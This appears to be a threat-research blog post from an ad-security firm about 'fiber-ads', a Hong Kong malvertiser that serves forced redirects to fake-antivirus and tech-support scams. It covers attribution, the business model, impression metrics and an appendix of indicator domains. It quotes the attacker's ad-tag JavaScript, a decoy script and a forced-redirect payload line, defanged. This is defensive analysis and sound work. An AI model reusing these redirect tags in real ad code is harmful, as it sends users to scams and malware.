Hong Kong Based Malvertiser Brokers Traffic To Fake Antivirus Scams — Over 100 Million Ads Compromised In 2019 So Far
This blog post explores the techniques and tactics of a persistent malvertiser that operates under a company called “fiber-ads”. We provide an overview of the metrics behind their current and historic activity, a glimpse into their infrastructure, and some details around the impact from exposure to their campaigns.
A History Of High Profile Activity
In the last several months, there have been reports circulating on social media and tech news outlets around malvertisements surfacing through Windows 10 desktop applications. The first details around this activity were published by French security researcher and blogger Malekal:
Shortly after, the story was covered by Bleeping Computer:
While these incidents are somewhat unique in that they are spawned outside of the confines of a web browser, in-app advertisements are not the only vehicle of delivery for this particular attacker. In fact, this application based activity is likely just spill over from this bad actor’s already active and disruptive malvertising rampage.
Our goal is to augment the knowledge that has already been shared with the data that we have available from tracking and blocking this attacker on behalf of our publisher and platform clients.
Tactics, Techniques, & Procedures
This attacker has been been seen on multiple platforms and exchanges. At the time that this attacker first started getting some notice from researchers and the media, the entry point for them was often the following domain:
ads.creative-serving.com
This is the ad serving domain for Platform161, which in this case is acting as the DSP (realtime ad buying platform).
Note: Platform 161 is a victim here and not the perpetrator. We’ve since worked with them to identify and shut off the buyer. (More on that buyer later.)
The creatives are served with little to no variation besides the intermediate ad serving domains that the attackers churn through. The attacker’s creative tag does nothing more than load a script and what looks like an SSP pixel:
document.writeln("<script type=\"text\/javascript\" src=\"hxxps:\/\/www.yukongoldinfo.com\/yuk.php?pic=ab454.jpg&pub=yukg&dom=redacted.com&ub=bsw_openx&tre=[referreringdomain.com]\"><\/script>");document.writeln("<img src=\"hxxps:\/\/redacted\/sync?dsp_id=4&user_id=0285678c-12f2-4077-9988-48e816b3cb04&ssp=&expires=6&user_group=4&cb=440\" alt=\" \" style=\"display:none\"\/>");The final script:
!function(t) {
function e(r) {
if (n[r])
return n[r].exports;
var a = n[r] = {
exports: {},
id: r,
loaded: !1
};
return t[r].call(a.exports, a, a.exports, e),
a.loaded = !0,
a.exports
}
var n = {};
return e.m = t,
e.c = n,
e.p = "/min/",
e(0)
}([function(t, e) {
function n() {
return document.getElementsByTagName("script")
}
function r() {
var t = document.createElement("div");
return t.innerHTML = "<a target='_blank' href='hxxps://www.redacted.com/form/signup/freetrial-elf-v2/?d=70130000000EqoP'><img src='hxxps://www.yukongoldinfo.com/uploads/pictures/ab454.jpg' style=\"border:none;\" /> </a>",
t
}
var a = n()
, o = a[a.length - 1]
, c = r();
o.parentNode.appendChild(c)
}
]);Of course this is a subterfuge, served only to those impressions that don’t pass the targeting criteria as determined by the bad actor’s ad serving domain(s). The code is designed to look like ad tech, but does nothing more than render a fake creative.
In the event the attacker decides to spawn an actual redirect, the user will have an experience much like the one outlined in the original Malekal report:
https://www.malekal.com/malvertising-sur-microsoft-menant-a-des-arnaques/
The evil payload is an all too familiar redirect:
top.location.href="hxxps://chanelets-aurning.com/a54334ea-7651-49b6-aa60-3b66ab1afbd3?dom=redacted&ub=adnexus";Refresher - Malvertisers rely on forced redirections in order to drive victims to phishing pages, tech support scams, or drive-by downloads. The redirections spawn without any user interaction.
The Attribution Model
Large scale malvertisers tend to leverage at least some automation in their infrastructure deployments as they need to pivot often in order to maintain persistence. These folks are no different.
Let’s take a closer look at their ad serving endpoint(s):
hxxps://www.yukongoldinfo.com/yuk.php?pic=ab454.jpg&pub=yukg&dom=redacted.com&ub=bsw_openx&tre=
[referreringdomain.com]Fortunately, the automation chosen here provides an extremely reliable attribution formula. The first three letters of the domain are used for the ad serving php script, which is consistently passed this `pic` and other parameters.
Given this pattern, we are easily able to track this attacker’s historic and future behavior. In just 2019 so far, we have seen them churn through over 50 domains, all of which are registered at Namecheap. The complete list is available under Appendix A .
Malvertising activity that fits this MO can be traced back to over 100 additional domains going all the way back to 2017.
New ad serving domains from this malvertiser continue to surface on a weekly basis on varying platforms.
The Business Model
In March 2019, we were fortunate to receive some feedback from one of our platform customers regarding a campaign that fit the attribution model for this attacker. We were told that the buyer, “fiber-ads”, has been active as of January 2019.
We were able to confirm this exact buyer with multiple platform partners as well. We were also told that they recently pivoted to a new corporate identity, “Clickfollow”.
Both companies are based out of Hong Kong:
Further research into fiber-ads reveals a fascinating glimpse into the malvertiser business model via their profile and behavior on MyMediAds.com — a social network-cum-marketplace for media buyers.
The fiber-ads profile on MyMediAds reveals an active participant in a gray market where advertisers can transact or form joint ventures with hawkers of cheap inventory that has very questionable provenance.
While the two screenshots below are not specific to campaigns attributed to fiber-ads, they are great examples of landing pages for the types of “Sweepstakes” and “Mobile” offers usually leveraged by malvertisers to further affiliate fraud.
Here’s a typical listing by fiber-ads that garnished many eager offers from enterprises that are most likely botnet operators or brokers of poor quality traffic:
Here are additional examples that show how fiber-ads position themselves as a middleman in questionable supply-side and demand-side practices:
Measuring The Impact
When visualized, campaign volumes associated with this attribution model paint a picture of a very active and persistent malvertiser. The two peaks below are approximately 28MM and 14.5MM impressions respectively with over 100MM impressions served this year as of mid June.
Desktop and mobile devices are targeted in relatively equal quantities, but desktop Windows and iOS are heavily favored by the attacker:
Payload Analysis
So how do these campaigns actually play out in the wild? Unfortunately there’s no consistent formula given the “middleman” positioning that fiber-ads has chosen in this gray market.
On one hand, it’s clear that these folks specialize in forming relationships with legitimate DSPs. This gives them access to premium audiences. From there, it’s unclear how much of the campaigns that they run are actually theirs or those of their partners/customers.
The takeaway from this is that once an impression is compromised and browser is redirected, anything is possible. The best case scenario is a gift card or cell phone giveaway scam, but there is plenty of evidence that suggests a network of landing pages that carry much higher risk — either tech support scams or fake anti-virus downloads.
Back in May and June there were several well documented incidents that bear attribution markers with this wave of campaigns. Taha Karim of our security team provides the payload insights below:
The VirusTotal sample is a good starting point for a deeper investigation into the actual malware that’s being proliferated through these campaigns:
Most malware installers of this nature are designed to siphon as much revenue as possible from a compromised machine. Usually this takes place in the form of a software that orchestrates further ad fraud or targets the victim directly - or both.
We took a closer look at ReImageRepair, which is a known scam software that falls into the latter category. The installer itself, though suspicious, does not appear to take any direct malicious action on the infected host. Rather, it exploits fear much the same way a tech support scam would:
The payload above is at least 6 weeks old — but what does it look like today? Unfortunately, and to no one’s surprise, the malvertisements persist, but the flavor of the payload is always evolving. The same endpoint we analyzed that drops the malware served by fiber-ads again looks towards phishing and fear tactics to drive installs:
These “mac cleaning” apps have been seen circulating since 2017, delivered through “Mughthesec” macOS malware:
Final Thought
Generally, malvertisers fall into one of two categories. There are those that own the entire delivery chain, including the monetization after a victim is infected. Then there are those like fiber-ads who act as intermediaries. Both are equally as disruptive — but the latter introduce an additional layer of complexity when it comes to attribution.
The middle-men provide the delivery mechanism, but from there the trail can get murky very quickly as the ultimate payload probably goes to the highest bidder, or to whomever the malvertiser is partnered with at that particular moment.
As a parting thought, we would like to suggest that ad tech platforms take extra care to vet their advertisers — and if something smells a bit fishy, like a buyer incorporated in a dodgy jurisdiction, it might be prudent to bypass that business opportunity altogether.
Appendix A — Indicators Of Compromise
Ad serving domains used by fiber-ads in 2019:
*.ticktockhealth.com
*.hugexdeal.com
*.happylifebab.com
*.upcum.com
*.hilltopgo.com
*.manorparty.com
*.oddheels.com
*.topgreatxoffers.com
*.naughtyxparty.com
*.softxbutt.com
*.gunnersalmighty.com
*.amazingfunnvideos.com
*.libreriamedina.com
*.robovoiz.com
*.travelstool.com
*.gladiatorbugs.com
*.clubpenguinclub.com
*.pennyotcstock.com
*.taodropship.com
*.wallpapersfacts.com
*.menuexamples.com
*.adminpromotion.com
*.commercedirections.com
*.wholesomehealthshop.com
*.trafficshirts.com
*.studiolineworks.com
*.safeonlinesites.com
*.thegreenzoneblog.com
*.salemyticket.com
*.trackmackweldon.com
*.adsalesforce.com
*.effectivelyreport.com
*.greenmentioned.com
*.recentphenomenon.com
*.requestingreview.com
*.includeinthebox.com
*.showgardener.com
*.romeoforum.com
*.automationeventually.com
*.yukongoldinfo.com
*.jasonsvid.com
*.blissfulonline.com
*.capsuledaily.com
*.clickercollections.com
*.wonderfulproductives.com
*.scaryheels.com
*.magararepublic.com
*.factorcontest.com
*.dialgold.com
*.justmarriedvideo.com
*.myaarzoo.com
*.gangidance.com
*.tacchisexy.comThanks
- Malekal for providing the original client-side payload. (Twitter: @malekal_morte)
